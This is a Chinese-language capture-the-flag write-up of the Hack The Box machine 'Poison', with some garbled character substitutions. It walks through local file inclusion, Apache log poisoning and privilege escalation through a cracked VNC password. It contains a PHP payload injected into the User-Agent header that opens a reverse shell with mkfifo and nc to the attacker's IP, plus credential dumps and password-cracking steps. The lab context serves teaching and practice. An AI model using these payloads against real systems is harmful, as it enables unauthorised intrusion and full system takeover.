免责申明

本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责

服务探测

探测凋谢端口

┌──(rootkali)-[~/htb/Poison]└─# nmap -p- 10.10.10.84 --open Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-29 21:11 ESTNmap scan report for 10.10.10.84Host is up (0.30s latency).Not shown: 37616 filtered ports, 27917 closed portsSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT   STATE SERVICE22/tcp open  ssh80/tcp open  httpNmap done: 1 IP address (1 host up) scanned in 161.63 seconds

端口服务详细信息

┌──(rootkali)-[~/htb/Poison]└─# nmap -sV -T4  -A -O 10.10.10.84 -p 22,80Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-29 21:15 ESTNmap scan report for 10.10.10.84Host is up (0.27s latency).PORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)| ssh-hostkey: |   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32|_http-title: Site doesn't have a title (text/html; charset=UTF-8).Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: FreeBSD 11.0-RELEASE - 12.0-CURRENT (97%), FreeBSD 11.1-STABLE (97%), FreeBSD 11.1-RELEASE or 11.2-STABLE (95%), FreeBSD 11.2-RELEASE - 11.3 RELEASE or 11.2-STABLE (95%), FreeBSD 11.0-STABLE (95%), FreeBSD 11.3-RELEASE (95%), FreeBSD 11.1-RELEASE (94%), FreeBSD 11.0-CURRENT (94%), FreeBSD 11.0-RELEASE (94%), FreeBSD 12.0-RELEASE - 13.0-CURRENT (92%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsdTRACEROUTE (using port 22/tcp)HOP RTT       ADDRESS1   290.93 ms 10.10.14.12   290.23 ms 10.10.10.84OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 25.96 seconds

web

http服务有一个文件蕴含破绽，输出文件的名字会蕴含这个文件，比方
http://10.10.10.84/browse.php?file=phpinfo.php

展现了phpinfo.php这个脚本的内容

咱们猜想代码的模式是

$file = $_GET['file'];include_once($file);

显然file这个参数是咱们能够管制的，以下playload打印了/etc/passwd,证实存在文件蕴含破绽

http://10.10.10.84/browse.php?file=../../../../../etc/passwd

# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin _ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin _tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin charix:*:1001:1001:charix:/home/charix:/bin/csh 

看到存在一个charix用户

文件蕴含破绽拿shell个别要合乎三个条件

1. web server存在文件解析破绽
2. 文件蕴含破绽
3. 能够读取web server日志 or 能够管制文件上传

具体例子查看这篇文章

apache版本是2.4.29，合乎第一条，第2条咱们曾经证实存在。

当初只剩第三条，没有发现上传点。那么 只能查看web server日志，通过枚举，确认web server日志在/var/log/httpd-access.log

咱们剖析一下一条日志会记录哪些内容

"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" 10.10.14.3 - - [30/Dec/2021:03:48:50 +0100] "GET /browse.php?file=../../../../../var/log/httpd-access.log HTTP/1.1" 200 3208001 "-

记录了浏览器引擎，起源IP，工夫，用户输出，http版本等

通过测试，如果间接批改用户输出会被过滤，然而浏览器引擎是能够注入的

咱们应用以下playload

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 4444 >/tmp/f'); ?>

burpsuite申请头为：

GET /browse.php?file=%3C%3Fphp+echo+%27hi%27%3B+%3F%3E HTTP/1.1Host: 10.10.10.84User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) <?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 4444 >/tmp/f'); ?> Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://10.10.10.84/Upgrade-Insecure-Requests: 1

而后再关上http://10.10.10.84/browse.php?file=../../../../../var/log/httpd-access.log

拿到webshell

┌──(rootkali)-[~/htb/Poison]└─# nc -lnvp 4444                                                                                               1 ⨯listening on [any] 4444 ...connect to [10.10.14.3] from (UNKNOWN) [10.10.10.84] 16668sh: can't access tty; job control turned off$ iduid=80(www) gid=80(www) groups=80(www)$ whoamiwww

提权到charix

在/usr/local/www/apache24/data找到一个加密密码文件

$ cat pwdbackup.txtThis password is secure, it's encoded atleast 13 times.. what could go wrong really..Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVUbGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBSbVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVWM040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRsWmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYyeG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01GWkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYwMXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVaT1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5kWFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZkWGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZTVm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZzWkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBWVmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpOUkd4RVdub3dPVU5uUFQwSwo=

N次base64解密当前明码是:Charix!2#4%6&8(0

ssh登录Charix账号

└─# ssh charix@10.10.10.84       The authenticity of host '10.10.10.84 (10.10.10.84)' can't be established.RSA key fingerprint is SHA256:IZ4OMzVPPZx2SlxKP/M0k/XAN8A1D6UpXXHcuMlJZXQ.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '10.10.10.84' (RSA) to the list of known hosts.Password for charix@Poison:Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017Welcome to FreeBSD!Release Notes, Errata: https://www.FreeBSD.org/releases/Security Advisories:   https://www.FreeBSD.org/security/FreeBSD Handbook:      https://www.FreeBSD.org/handbook/FreeBSD FAQ:           https://www.FreeBSD.org/faq/Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/FreeBSD Forums:        https://forums.FreeBSD.org/Documents installed with the system are in the /usr/local/share/doc/freebsd/directory, or can be installed later with:  pkg install en-freebsd-docFor other languages, replace "en" with a language code like de or fr.Show the version of FreeBSD installed:  freebsd-version ; uname -aPlease include that output and any error messages when posting questions.Introduction to manual pages:  man manFreeBSD directory layout:      man hierEdit /etc/motd to change this login announcement.By pressing "Scroll Lock" you can use the arrow keys to scroll backwardthrough the console output.  Press "Scroll Lock" again to turn it off.charix@Poison:~ % iduid=1001(charix) gid=1001(charix) groups=1001(charix)charix@Poison:~ % whoamicharix

提权

charix家目录下有个secret.zip文件

应用charix的ssh明码解密zip失去一个文件，然而如同无奈浏览

┌──(rootkali)-[~/htb/Poison]└─# cat secret��[|z!        

查看网络连接，发现开启了两个外部服务

charix@Poison:~ % netstat -an|grep LISTENtcp4       0      0 127.0.0.1.25           *.*                    LISTENtcp4       0      0 *.80                   *.*                    LISTENtcp6       0      0 *.80                   *.*                    LISTENtcp4       0      0 *.22                   *.*                    LISTENtcp6       0      0 *.22                   *.*                    LISTENtcp4       0      0 127.0.0.1.5801         *.*                    LISTENtcp4       0      0 127.0.0.1.5901         *.*                    LISTEN

kali本地执行两条命令，转发这两个端口

ssh -L 5801:127.0.0.1:5801 charix@10.10.10.84

ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84

扫描本地5801,5901，查看服务信息

┌──(rootkali)-[~/htb/Poison]└─# nmap -sV -Pn 127.0.0.1 -p 5801,5901                                  Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-30 03:01 ESTNmap scan report for localhost (127.0.0.1)Host is up (0.000064s latency).PORT     STATE SERVICE VERSION5801/tcp open  http    Bacula http config5901/tcp open  vnc     VNC (protocol 3.8)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 17.79 seconds

开了一个VNC服务。那么下面那个奇怪的文件有可能是VNC的加密明码

应用这个脚本破解下面的secret文件

┌──(rootkali)-[~/htb/Poison/vncpwd]└─# ./vncpwd /root/htb/Poison/secret       Password: VNCP@$$!

应用上面命令登录vncviewer localhost:5901,输出明文明码

胜利登录到root账号

┌──(rootkali)-[~/htb/Poison]└─# vncviewer localhost:5901                                                                                    1 ⨯Connected to RFB server, using protocol version 3.8Enabling TightVNC protocol extensionsPerforming standard VNC authenticationPassword: Authentication successfulDesktop name "root's X desktop (Poison:1)"VNC server default format:  32 bits per pixel.  Least significant byte first in each pixel.  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0Using default colormap which is TrueColor.  Pixel format:  32 bits per pixel.  Least significant byte first in each pixel.  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0Same machine: preferring raw encoding

起初发现，间接应用加密的secret文件也是能够登录的
vncviewer -passwd /root/htb/Poison/secret 127.0.0.1::5901

最初吐槽下，国内网络近程开vnc真是太慢了。。